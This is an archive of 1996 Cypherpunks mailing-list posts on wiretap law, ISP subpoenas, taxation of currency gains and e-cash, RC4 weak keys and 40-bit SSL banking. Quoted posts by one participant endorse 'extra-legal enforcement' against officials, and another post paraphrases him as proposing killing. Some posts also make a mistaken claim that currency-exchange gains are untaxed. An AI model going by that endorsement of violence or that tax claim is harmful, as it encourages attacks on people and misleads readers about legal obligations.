>Compressing the data probably won't hurt (*probably*, and assuming you
>take the header off!).  But Unix compress won't make data look
>statistically random, and I doubt pkzip will either.  Neither one will
>give you a useful estimate of the entropy in the data stream.  You
>have to guess that yourself, and then use a strong hash function to
>get it down to that point.
>
>-- 
>. Eli Brandt                                        usual disclaimers .
>. eli+@cs.cmu.edu                                  PGP key on request .
>. violation of 18 U.S.C. 1462:                                  "fuck".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddfr@best.com (david friedman)
Date: Tue, 9 Apr 1996 17:06:42 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <v02130506ad8f34b49dc3@[129.210.77.17]>
MIME-Version: 1.0
Content-Type: text/plain


>It is exactly this attitude that we need to change.  I presume you saw my
>comment from a day ago, when I pointed out that before 1968, local phonecos
>were doing wiretaps without any sort of court order, ...

>I'm still waiting for somebody to show that the majority of crimes that are
>investigated using subpoena power are "malum in se" crimes, as opposed to
>"malum prohibitum" ones.
>
>Jim Bell

Have you read _The Hacker Crackdown_? I think it is pretty clear that part
of what was going on there involved law enforcement people deliberately
punishing BBS operators for behavior that was wicked but not
illegal--basically facilitating communications involved in committing
crimes (credit card number theft and the like). The punishment consisted of
seizing the computer and backups and holding it for a year or so as
"evidence"--without ever filing charges.

Conceivably the owner could have taken legal action--but doing so would
give the law enforcement people an incentive to file charges, thus imposing
large costs on the owner even if he was innocent of any crime and could
eventually prove it.

I suspect that a good deal of this goes on in most law enforcement systems,
in one form or another. Charging and convicting people is costly, even if
they are guilty--and there is often behavior that law enforcement people
want to prevent that is not even illegal. On the other hand, there are lots
of things police can do that impose sizable costs but do not require a
conviction, such as arresting you, holding you in a cell overnight, but
never actually trying you for anything.

David Friedman

David Friedman
School of Law
Santa Clara University






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 9 Apr 1996 14:28:08 +0800
To: Jim Gillogly <jim@ACM.ORG>
Subject: Re: the cost of untracability?
In-Reply-To: <199604071953.MAA03973@mycroft.rand.org>
Message-ID: <Pine.SUN.3.91.960408152836.398A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Apr 1996, Jim Gillogly wrote:

> 
> jim bell <jimbell@pacifier.com> writes:
> >FWIW, I think that there is no capital-gains-type tax on currency 
> >conversions.  In other words, if I take dollars and buy yen today, and the 
> 
> I bounced this off a CPA, who said she would be very suprised if this is
> really the case: in general the IRS considers increases in wealth to be
> taxable, and unless there's a specific exclusion for currency transactions
> that she doesn't know about, she suspects this is not the case.  As a
> conceptual counterexample she points out that you are responsible for any
> profit you make from selling your car for more than you pay for it (but,
> as you might expect, you don't get to take a loss if you sell it for less).

Gains on currency 'speculation' (which this example is, even in the 
absence of intent to profit) are most certainly included in income for 
the purposes of U.S. tax.  Moreover, they are not capital gains income in 
the case of short term transactions like this.  As a result, instead of the 
lower rate on capital gains, they will be taxed at normal graduated rates.

In addition, to prevent funds from being removed to non-resident aliens 
or foreign entities where tax enforcement and collection is difficult, 
there is a 30% withholding requirement in the event the payee is not a 
U.S. citizen or resident (for tax purposes).  Note that this requirement 
is imposed on the paying entity regardless of the disposition of the 
funds.  That would mean that if the e-cash bank were to pay profits to a 
foreign payee without withholding, the IRS would hold the bank itself 
liable and let the bank deal itself with collecting the tax from the 
account holder on its own time and after paying the IRS.

> >interconvert rate changes and I convert back and make a "profit," that is 
> >not considered income.  If that's the case, then ecash has an excellent 
> >precedent behind it to avoid any taxes on interest, especially if that
> >interest is, in effect, paid by increasing the inherent value of the
> >currency.
> 
> My tame CPA also volunteered the information that the IRS is very interested
> and concerned about how they're going to capture transaction information for
> electronic transactions, and they do think it's in their bailiwick... she's
> read some articles on it.
> 
> 	Jim Gillogly
> 	17 Astron S.R. 1996, 19:52
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 9 Apr 1996 10:52:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u66D6-0008z3C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960408153813.398C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Apr 1996, jim bell wrote:

> The following is a comment of mine that Unicorn didn't respond to.  My 
> comments are included as well. I repeat this because I just saw a quote from 
> Lysander Spooner which was appropriate under the circumstances.  Those who 
> read Unicorn's notes will notice that he frequently ignores embarrassing 
> gaffes that he makes.
> 
> [beginning of re-quote]
> 
> 
> At 08:56 PM 3/30/96 -0500, Black Unicorn wrote:
> >> Naturally, you won't address this 
> >> problem, but the man-on-the-street is more realistic about his own privacy.  
> >> How many times must I raise this issue?  How many times do you ignore it?  
> >> Face it, people are smarter than you give them credit for.  They will simply 
> >> not tolerate any more shit from the government.
> >
> >Funny, the latest primary has been one of the highest voter turn outs in 
> >quite a while (except in Deleware).  Considering those are the law-and-order 
> >types who are most likely to invade personal liberities, I think its a 
> >bit hard to make the case that the temper of the country is anything but 
> >very pro-political process.
> 
> Unicorn again displays his cluelessness.  
> 
> To put it in simple terms that even you should be able to understand, the 
> fact that a drowning person moves his arms and legs around a lot doesn't 
> mean that he LIKES to swim, it may merely mean that he likes drowning even 
> less.
> 
> [end of re-quote]
> 
> 
> Spooner's quote follows:
> 
>   "Doubtless the most miserable of men, under the most oppressive
> government in the world, if allowed the ballot, would use it, if they
> could see any chance of thereby meliorating their condition.  But it
> would not, therefore, be a legitimate inference that the government
> itself, that crushes them, was one which they had voluntarily set up, or
> even consented to."
> 
> Lysander Spooner

I didn't respond to this part originally because I grew tired of typing
"Yadda yadda yadda" everytime Mr. Bell lapsed into another
psycho-political babble session.

What this has to do with Mr. Bell's  position, that citizens as a whole had 
grown so discontented in the United States that they were prepared to rebell 
actively in large numbers, is unclear.  In fact the Spooner quote adds 
more to my position than Mr. Bell's:

"if allowed the ballot, would use it, if they could see any chance of 
thereby meliorating their condition."  

Seems that even according to Spooner, the citizens of the U.S. aren't 
hopeless yet.

In fact there is ample evidence that citizens who have come to believe 
that a sovereign is beyond redemption refuse to participate in the 
political process any longer.  Iran, Iraq, the former Soviet Union, 
Turkey, the Baltic States are all examples.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 9 Apr 1996 10:15:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: the cost of untracability?
In-Reply-To: <m0u65hy-0008ynC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960408154753.398D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Apr 1996, jim bell wrote:

> At 12:53 PM 4/7/96 PDT, Jim Gillogly wrote:
> >
> >jim bell <jimbell@pacifier.com> writes:
> >>FWIW, I think that there is no capital-gains-type tax on currency 
> >>conversions.  In other words, if I take dollars and buy yen today, and the 
> >
> >I bounced this off a CPA, who said she would be very suprised if this is
> >really the case: in general the IRS considers increases in wealth to be
> >taxable, and unless there's a specific exclusion for currency transactions
> >that she doesn't know about, she suspects this is not the case.  As a
> >conceptual counterexample she points out that you are responsible for any
> >profit you make from selling your car for more than you pay for it (but,
> >as you might expect, you don't get to take a loss if you sell it for less).
> 
> That assumes that there is "profit" from exchanging currencies.  On any 
> given transaction, there is never any "profit."  The only thing that might 
> be called a profit is a difference in exchange rates, and that really isn't 
> an increase in wealth at any point.   Ask that CPA to look it up.

Instead I'm going to ask the author to look up "taxable event."  Seems 
Mr. Bell now has an LL.M. in taxation.

> This makes sense:  If the currency in my pocket becomes less valuable due to 
> inflation, I cannot deduct the loss.  If it becomes MORE valuable due to 
> deflation, I do not need to declare the difference as income.  Currency 
> transactions only generate "profits" from a change in conversion rates, 
> which are simply differences in inflation rate between two currencies.  

This assumes that the e-cash is never converted into anything other than 
more e-cash.  It also assumes that the IRS will not assess taxes on 
currency held in a foreign denomination by converting it (theoretically) 
to U.S. currency values first.  In fact this is precisely what is done.  
If the e-cash you are holding in your pocket, or whatever, changes 
dramaticaly in value because of a change in currency rate, then that's 
profit.

If Mr. Bell's supposition were true I could make 20 million dollars 
speculating on DM or SwFr and never pay the IRS so long as I didn't 
convert the currency to U.S. denominations.

> >>interconvert rate changes and I convert back and make a "profit," that is 
> >>not considered income.  If that's the case, then ecash has an excellent 
> >>precedent behind it to avoid any taxes on interest, especially if that
> >>interest is, in effect, paid by increasing the inherent value of the
> >>currency.
> >
> >My tame CPA also volunteered the information that the IRS is very interested
> >and concerned about how they're going to capture transaction information for
> >electronic transactions, and they do think it's in their bailiwick... she's
> >read some articles on it.
> 
> The answer is, "They're not!"  That's right, you heard me.  It's uphill all 
> the way for the IRS.

I hope Mr. Bell is correct in this, but the battle is not over yet.
U.S. banks will almost certainly not participate in a totally anonymous 
e-cash scheme any time in the next pair of decades.  Offshore banks will 
be the key.


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 9 Apr 1996 15:59:29 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u5Q3q-0008xlC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960406132040.2832E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Apr 1996, jim bell wrote:

> At 03:49 AM 4/5/96 -0500, Black Unicorn wrote:
> >On Thu, 4 Apr 1996, jim bell wrote:
> 
> >> I really don't think you're giving me enough credit.  I am fully aware that 
> >> in the past, the organizations on which wire-tap-type subpoenas were served 
> >> (primarily AT+T, "The phone company") were very cooperative with the police 
> >> and probably "never" challenged the subpoena. There is the law, and there 
> is 
> >> the usual reaction to that law, and I expect that much of Unicorn's 
> position 
> >> is based on a (false) assumption that this reaction will necessarily 
> >> continue unchanged.
> >
> >Now, if this is your postion, let's see some support.
> 
> You do the research.  Until 1968, Federal wiretaps were illegal, by the 
> Federal communications Act of 1934.

I was asking for you to support your position that my 'assumption' that 
"this reaction" will continue (i.e. that telecos and ISP's would 
cooperate with investigations), was false.  What the history of wiretaps 
has to do with this, except that it supports my position the government 
has enough intimidation power to bully their way, is not clear.

> 
> >From Encyclopedia Brittanica, 1970, vol 23 page 592:

Uh huh.  Ok.

> It is reasonable to assume that most wiretaps, when they were done, were 
> assisted by the local phone company (usually AT+T).  In other words, AT+T 
> assisted the government in illegal actions.

Actually, this is not reasonable to assume, mostly because it's false.  
While some very small number of illegal wiretaps might have involved phone 
company complicity, the vast majority of illegal wiretaps were of the 
alligator clip vareity and require little if any phone company 
assistance.  This is why Digital Telephony was such a big deal.

   What happened in 1968 
> was that Congress, recognizing this situation, decided to "compromise":  
> They declared those wiretaps legal, if a warrant was obtained, and and a sop 
> to the cops they allowed that evidence into court.

This is indeed a creative intrepretation.

  But them's the details.  
> The fundamental point is that if AT+T would engage in illegal activity to 
> benefit the cops or Feds, they would certainly go less far to give the 
> government what it wants, whether or not that was illegal.  Clearly this was 
> (and is) a non-arm's length relationship.

I don't follow.  Phone company does outrageous things to help feds, so 
it's safe to assume that they would do less?

> >very credible threat of financial and custodial sanctions.  Obstruction, 
> >or conspiracy is a crime, and in the case of the FBI, a federal crime of 
> >some magnitude.
> 
> As usual, you misrepresent the situation.  You're setting up a straw man.  
> "Appeals" are not "obstruction."

And appeals come after equipment has been seized.
 
> >While some ISP's may indeed feel they are able to resist the whims and 
> >enforcement powers of the United States, they are likely to be offshore, 
> >small, and viewing themselves as out of the reach of U.S. jurisdiction.
> 
> You continue to build that straw man.  
> 
> And I notice that you said "whims"?  What did you mean by this?  Are you 
> suggesting that there is something wrong or illegal with "resisting the 
> whims" of the government if that government has no legal basis for 
> compelling cooperation with those "whims"?  I think it's interesting that 
> with each paragraph you set little traps for yourself, and fall into them so 
> embarrassingly.  

I have never offered the view that these things are not distasteful.  You 
see inconsistancies in my view because you have assigned that position to 
me.  The reality is that all court rulings require a bit of whim.  We 
differ in that I don't suggest killing judges is the way to deal with it.

[...]

> >It is worth bearing in mind that subpoenas are not the only tool that 
> >authorities can use to affect compliance.  In many cases authorities 
> >simply seize the equipment and hold it for the statuatory period before 
> >which  they are required to file charges in.  The Ripco BBS in Chicago, 
> >victim of the Sun Devil raids, is a prime example.  In that case the 
> >equipment was seized (via sealed warrant which later proved to authorize 
> >seizure of "computer or other electronic equipment of any nature."  and in 
> >actuality resulted in the seizure of everything from disks to printers 
> >to telephones), and held for five years before finally being returned.  
> >Clearly it was obsolete by this time.  No charges have been filed.
> 
> What I repeatedly find amazing about Unicorn's commentary is that he lists 
> actions and behaviors of government that most of the rest of us find 
> disgusting or egregious, and then he seems to take the position that it is 
> impossible to prevail in court against those actions.  

Change the sentence above to indicate that I take the position that is it 
"difficult in the extreme to prevail in court against those actions." and 
you have hit my position on the head exactly.

Again, you find this amazing because you have attributed to me an 
approval of this status quo which I do not have.

> Even if that limited opinion were true, to the extent it's true that merely 
> goes to show why we can't expect justice from courts, and why we're going to 
> have to set up a system to ensure that these egregious actions get punished.

I find it interesting that Mr. Bell, who demands formalism as a rule when 
reading the bill of rights, is so quick to condemn officials to death 
without their right to due process.

> >In practice many ISP's or phone co's will not have the opportunity to 
> >defend the matter in court without their services and equipment being 
> >forcibly seized preemptively.
> 
> Oh, really?  Do you realize what you've just admitted?  You're your own 
> worst enemy.  Let me quote you something you said below:
> 
> >There are ways to resist compelled discovery.  These are not they.
> 
> Sounds like a big contradiction, right?  You can't even keep your story 
> straight!  Your loyalty to the truth is nil.  Yet another trap you set for yourself.  

How is this a contradiction?

Service providers can expect to have their equipment preemptively seized 
if there is reason to believe the data might be destroyed (this is the 
sun devil example) and as such if you want to resist compelled discovery 
as an ISP, an open policy that you will assist the account holder in 
thawarting the authorities is not the way to do it.

> >What you have described is a crime.  Your "clever" lawsuit isn't going to 
> >fool any judge, or anyone else.
> 
> There is a big difference between "not fooling the judge" and becoming a 
> crime.  As I pointed out before, these are exactly the kinds of issues that 
> have "never" been enthusiastically challenged by an ISP or telco.  Your 
> assumption that such challenges will never happen, or will fail is touching.

Ripco BBS and Steve Jackson Games both contested their seizures with 
passion.  It didn't get them their equipment back any sooner.
 
> >> My point in the first paragraph that I am quoted in above is 
> >> that many of the challenges that have never been made against wiretap 
> >> subpoenas, due to a closer-than-arms-length relationship between the 
> phoneco 
> >> and the government, _will_ be challenged.
> >
> >This argument relies heavily on the absence of other persuasion to comply 
> >with wiretaps, which, as I have demonstrated, exist in abundance.  Thus the 
> >thing falls in upon itself.
> 
> The error you just made is to confuse the issue of adjudication and 
> enforcement.  All you just said was that, once the final decision is made, 
> it can be enforced.  I don't think it's necessary for me to challenge that 
> claim, for the purposes of my point.  My point is that challenges to 
> subpoenas can and do occur, WHEN THE PERSON OR CORPORATION NAMED _wants_ to 
> do them, and up until now that organization regularly failed to do so.

The result will simply be resort to seizure warrants to get the 
equipment, followed by contempt charges for refusal of the account holder 
or ISP to reveal the key.

You can fight this, sure, but it's only going to do you any good if you 
win.  In any event the ISP will be out the equipment for the duration.  
Prosecutors are not going to take these developments sitting down.

> >You're claiming that a court is going to distinguish the case where a 
> >small ISP/telco refuses to comply with a compelled discovery order from a 
> >case where a large telco typically complies with a discovery on the basis 
> >that the large company complies only under compulsion or in self interest?
> >
> >This amounts to "A obeys the law because he wants to.  B doesn't want to 
> >obey the law, therefore B need not."
> 
> Further "straw-man" behavior. You just misrepresented the issue.  I'll 
> re-write it:
> 
> "A obeys not only the law without question, but also agrees with all 
> requests even if they are beyond the legal scope of the subpoena, and 
> generously helps the cops, challenging nothing.  B challenges everything, 
> and uses 'every trick in the book' to eliminate or minimize his obligations 
> under the law"
> 
> There, that's better.
> 

And so how is B less required to comply with the law, including 
cooperating with lawfully issued search and seizure warrants executed by 
duly appointed law enforcement officials, appearing to testify at the 
request of the court and complying with court orders?

> >As I have tried to explain to Mr. Bell before, the days of legal 
> >formalism are over.  Substance over form prevails today. 
> 
> What, exactly, does this mean?  Are you saying, "The Constitution is dead"?  
> Are you implicitly acknowledging here that my points are, or at least, WERE 
> valid under a previous interpretation of the Constitution?  What, exactly, 
> happened to change this?  Who passed which law to change it?

Study your history.  Card catalogue under "Schools of American Legal 
Thought."

> 
> >The substance 
> >of this transaction is to inform the client that an investigation is 
> >ongoing.  This is a major no-no, whatever Mr. Bell thinks he knows.
> 
> "major no-no"?    It sure is interesting how Unicorn uses thes high-falutin 
> legal terms like "major no-no" to describe the intricacies of subpoena law.

I thought it might be easier for you to understand.  Clearly this was my 
error.

> >> (and, in fact, may be 
> >> required under my contract with him, should he be obligated to do a tap or 
> >> know one exists.)
> >
> >As I explained before, contracts are void to the extent they are 
> >illegal. 
> 
> Unicorn proves, once again, that a little knowledge is a dangerous thing.
> 
> But I don't think that FAILING to send a particular certification (that the 
> ISP isn't under subpoena) constitutes an "illegal" contract.  The 
> fulfillment of that term is not legally required, absent a contract, and 
> likewise it is not generally prohibited if it is part of a contract.  It 
> looks like the government has no basis to object to either sending that 
> certification or failing to.

Mr. Bell proves that no knowledge is a dangerous thing.

It was Mr. Bell's position that an ISP would provide warning to an account 
holder, and if it refused it would be subject to the consequences of 
breeching some agreement.  This was how he 'got around' the problem of 
the authorities compelling the ISP to cooperate in their investigation.  
To do so, he argued, would expose the ISP to contractual liability.

A clause in a contract which reads, and to be clear would have to read, 
"ISP shall send regular certifications until such time as law 
enforcement officials, civil litigants, or other parties unrelated to the 
account holder enquire as to or require disclosure of account holder's 
personal information or data."

Now, please tell me how this clause, and the warning therein, is passive 
resistance.

> In a government-centric philosophy enthusiastically promoted by Unicorn, 
> government is the only enforcer.  In the real, digital world of the future, 
> digital reputations will enforce behavior.  A practice by an ISP to tolerate 
> subpoenas without legal challenge will become well-known, and that ISP will 
> shrink to oblivion unless he changes his policies.

I merely acknowledge that government centric enforcement is the status 
quo.  Any approval thereof is your imposition.

> >Mr. Bell's response?  "Well, then we'll kill him and enforce 
> >the contract that way."
> 
> Given the repeated admissions you make that the government can and does 
> engage in outrageous behavior, I'd say that extra-legal enforcement is 
> clearly warranted.

And there we differ.

> >Incorrect.  They have been challenged time and time again in the context 
> >of compelled discovery.  Time and time again compelled discovery has been 
> >required, TRO's forbidding the destruction of documents and other 
> >evidence issued, search warrants and seizure effected in place of subpoena.
> 
> For a different class of people and corporations, yes.    Not ISP's, and as 
> far as I know, telephone companies have never pushed the envelope.  If you 
> have any specific contrary examples, show me.

I can't comment as to ISPs.  BBSs have been a frequent victim of compelled 
discovery and preemptive seizure.  Why precisely you think that court's 
will make a distinction must be an interesting chain of logic.

Compelled discovery is a wide judicial tool.  I don't know what the 
circumstances under which it would be ruled illegitimate would be.  I am 
almost positive that these circumstances would not include an 
uncooperative and or obstructive (legal or illegal) ISP.

> >The telco in past has not complied with such orders because of some grand 
> >government conspiracy, 
> 
> You statement is wildly in error.  AT+T clearly did phone taps for the 
> government prior to 1968 PRECISELY due to "some grant conspiracy":  It 
> certainly didn't do them because AT+T was _legally_obligated_ to.

Well I'm afraid you'll have to back this up with more than assumptions 
and the encyclopedia.

> >although I realized Mr. Bell finds such things 
> >immensely sexy.  It has complied because its officers faced criminal and 
> >financial sanctions for non-compliance.
> 
> Which is an interesting statement, given the fact that I pointed out that in 
> the period of 1930-1968, the phone company assisted with ILLEGAL wiretaps.  
> Are you suggesting that during that time frame, they actually violated the 
> law under threat of "criminal and financial sanctions for non-compliance"?  
> What kind of government threatens people with "criminal and financial 
> sanctions" for NOT assisting it with illegality?  
> 
> Yikes!  Somehow I think your morality is about as warped as it comes.  Yet 
> another trap you set for yourself, and you jumped right in.

The only trap I fell into was bothering to respond to you.

> 
> >
> >There are ways to resist compelled discovery.  These are not they.
> 
> What you haven't explained or demonstrated is how ISPs could become more 
> agressive in their defenses.  This failure is typical of you:  Your bag of 
> tricks is empty _unless_you_are_paid_.

You're pretty socialist for a libertarian

> Jim Bell
> 
> jimbell@pacifier.com


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "JR Weaver" <weaver@harry.bwi.wec.com>
Date: Tue, 9 Apr 1996 11:09:46 +0800
To: jk@digit.ee>
Subject: Re: Bank transactions on Internet
In-Reply-To: <Pine.GSO.3.92.960408192320.16049B-100000@happyman>
Message-ID: <9604081642.ZM1632@harry.bwi.wec.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 8,  2:04pm, Perry E. Metzger wrote:
> Subject: Re: Bank transactions on Internet
>
> > Suddenly some banks here in Estonia have decided that they must start
> > offering banking services over Internet already during the next months.
> > What worries me is that some of them are talking about using 40-bit SSL as
> > the main security mechanism.
>
> That seems very silly. Considering that you folks have no laws
> preventing you from using better I would suggest not doing something
> so foolish -- 40 bit RC4 is almost worthless as a cryptosystem as the
> recent paper on key lengths points out.
>
> Perr
>-- End of excerpt from Perry E. Metzger

I can verify that Security First Internet Bank uses 40-bit SSL +
Username/Password. Their HTTP server also supports 128-bit SSL, however they do
not suggest one over the other. I took it upon myself after opening an account
with SFNB to purchase my own copy of 128-bit Netscape Navigator. You can make
transactions over the net and SFNB does not limit you to 128-bit. Is it really
that easy to break 40-bit? Don't you need access to a "fair amount of cpu
power"
to brute force crack 40bit? As far as I know client authentication is strictly
username & password. What other authentication system exists??

J.R.Weaver






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 9 Apr 1996 12:53:57 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Bulletin: Cypherpunks say no taxes owed by moneychangers!
In-Reply-To: <ad8ea2c0010210042ee1@[205.199.118.202]>
Message-ID: <3169901C.3A71@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> >That assumes that there is "profit" from exchanging currencies.  On any
> >given transaction, there is never any "profit."  The only thing that might
> >be called a profit is a difference in exchange rates, and that really isn't
> >an increase in wealth at any point.   Ask that CPA to look it up.
> 
> There are people and companies who make a nice business in currency
> exchange, ranging from the large companies one finds in international
> airline terminals and banks to the smaller, "Mom and Pop" moneychangers one
> finds in barrios and other such places.
> 
> These moneychangers attempt to make a "profit" on each exchange (else
> they'd hardly stay in business).
> 
> It will probably come as a surprise to them that, according to both a CPA
> and Jim Bell, no taxes are owed on their businesses, as "no wealth was
> created."

This sounds like the kind of thing that the mysterious "Alternative
Minimum Tax" was designed for.  One area that I *know* it applies
to is incentive stock options offered to employees of a company.
If you have such things (like, let's say you were hired to clean
the monitors at Netscape last January, and they gave you a thousand
options because your limp and stutter were so cute), and you exercise
the options but don't immediately sell the stock, then your taxable 
income is figured based on the "paper" gain you made by transforming
your $0.10/share options into $100/share stock.  You get to deduct
the taxes you pay now when you decide to sell your stock and realize
actual gain, but AMT is real and it can bite (particularly if you're
unwise enough to exercise while you're in the post-IPO lockout period
and that period overlaps April 15th).

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyap@mailhub.garban.com (Noel Yap)
Date: Tue, 9 Apr 1996 10:52:45 +0800
To: cypherpunks@toad.com
Subject: Re: RC4 improvement idea
Message-ID: <9604082133.AA15440@mailhub.garban.com>
MIME-Version: 1.0
Content-Type: text/plain


> I got a paper from the cryptography technical report server  
> "http://www.itribe.net/CTRS/" about a weak class of RC4 keys.  The 
> report said that with some keys, it was possible to predict what some 
> parts of the State-Box would be.  I was thinking of a way to fix this, 
> and had this idea:
> 
> do some sort of hashing function with the key that derives a number 
> between 55 and 500 or something like that, then scrabmle the S-box that 
> many times.  In this way, the chances that the State-Box will have any 
> correlation becomes extremely small.  I think it is 1/125 to begin with 
> anyway, so this would make it around  1/(125*NumPasses).  And since the 
> exact number of passes is a function of the key, the cracker won't know 
> how many times it went through.   I tried this out and having 1000s of 
> passes doesn't effect the randomness of the state-box in any negative 
> way, possibly it makes it more random? If anyone has any thoughts I'd 
> love to hear them.

The S-Boxes in DES were optimized to hinder Differential Cryptanalysis.  I've seen no studies on the effectiveness of jumbling the S-Boxes during encryption -- even Biham and Shamir's book doesn't mention it -- but, I figure, if it helps, DES would probably already be doing it (unless of course the NSA thought the jumbling would make too good an algorithm).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyap@mailhub.garban.com (Noel Yap)
Date: Tue, 9 Apr 1996 10:53:16 +0800
To: jamesd@echeque.com
Subject: Re: RC4 improvement idea
Message-ID: <9604082143.AA15502@mailhub.garban.com>
MIME-Version: 1.0
Content-Type: text/plain


> For one key in 256, you can tell what eight bits of the state box are.  
> For one key in 64000 you can tell what sixteen bits of the state box are, 
> and so on and so forth.
> 
> Such keys are not weak.

Any statistical correlation can be used to an attacker's advantage.  Maybe your kid sister might not be able to figure it out, but someone else out there will.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 9 Apr 1996 12:44:58 +0800
To: dwl@hnc.com (David Loysen)
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't
In-Reply-To: <199604081810.LAA22544@spike.hnc.com>
Message-ID: <199604082244.RAA20072@homeport.org>
MIME-Version: 1.0
Content-Type: text


David Loysen wrote:

| Most if not all credit card issuing banks use some form of fraud detection
| software. The next generation of these products will be analyzing
| transaction data from the card clearing banks in real time to stop
| fraudulent transactions before they are complete. Expect to see more "may I
| see your ID" questions as these systems flag transactions as possible fraud.
| I have had a credit card with my photo on it for several years, I can't ever
| remember a sales person who seemed at all interested in comparing the photo
| to me. 

	Most merchant agreements prohibit asking for more ID beyond
the card.

	As to the issue of 'do people look at photos?' they don't even
look at signatures.  I know because I carried a card around for 2
years before anyone noticed that I hadn't signed it.  The person who
noticed asked me to sign the card (without showing other ID!) before
handing over the computer I was buying.

Adam

cpunk relevance?  Most security that relies on people being awake is
broken.  Security that relies on people with no financial interest in
a transactions security is broken.  Studying how security breaks today
is a good idea.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zalchgar@juno.com (zalchgar)
Date: Tue, 9 Apr 1996 17:46:56 +0800
To: cypherpunks@toad.com
Subject: NSA Budget
Message-ID: <19960408.181433.15302.0.zalchgar@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there a public release of the NSA's annual Budget. If so is there a quarterly release. 
-Erinn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 9 Apr 1996 16:49:34 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: the cost of untracability?
Message-ID: <2.2.32.19960408231626.00c90cc8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:36 PM 4/8/96 -0400, Black Unicorn wrote:

>In addition, to prevent funds from being removed to non-resident aliens 
>or foreign entities where tax enforcement and collection is difficult, 
>there is a 30% withholding requirement in the event the payee is not a 
>U.S. citizen or resident (for tax purposes).

The withholding tax applies only if the payee is not a resident of a
jurisdiction with a tax treaty with the US.  Net banking will further muddy
the waters on this because of the difficulty of telling the residency of
customers particularly in the case of accounts transferred to third parties
for profit -- a worthwhile future business activity.

DCF

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>
Date: Tue, 9 Apr 1996 07:17:01 +0800
To: E$ mailing list <e$@thumper.vmeng.com>, cypherpunks@toad.com
Subject: Bank transactions on Internet
Message-ID: <Pine.GSO.3.92.960408192320.16049B-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain



Suddenly some banks here in Estonia have decided that they must start
offering banking services over Internet already during the next months.
What worries me is that some of them are talking about using 40-bit SSL as
the main security mechanism.

What about banks in US and Europe, how many of them are using Internet and
WWW to offer their services already? Is it possible to use WWW forms to
make real transactions or can you just view your transaction history and
account status? In case the banks are using WWW forms and SSL, are the
services limited to 128-bit clients?

How is the client authentication handled? Does the client just get a plain
username and password?

I had a look at some banks like Security First National Bank and some
others, and it seems that they use just SSL + username/password for they
banking services. Does this really work, especially with 40-bit keys?

SSL with client certificates would seem a little bit more secure once it
is available, but still not secure enough for real banking on Internet.

Just curious (and confused),

Juri Kaljundi
jk@digit.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Tue, 9 Apr 1996 19:09:39 +0800
